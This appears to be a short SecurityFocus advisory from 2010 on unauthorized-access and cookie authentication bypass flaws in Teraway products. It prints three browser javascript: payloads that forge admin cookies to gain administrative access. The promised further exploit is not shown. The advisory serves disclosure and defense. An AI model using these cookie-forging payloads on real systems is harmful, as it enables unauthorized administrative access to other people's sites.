Multiple Teraway Products Unauthorized Access and Cookie Authentication Bypass Vulnerabilities

Attackers can use a browser to exploit these issues.

The following examples are available:

javascript:document.cookie="twLTadmin=userid=1&lvl=1;path=/";javascript:document.cookie="twFSadmin=1;path=/";
javascript:document.cookie="TWLHadmin=pwd=&lvl=1&usr=&alias=admin&userid=1;path=/";

An exploit is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus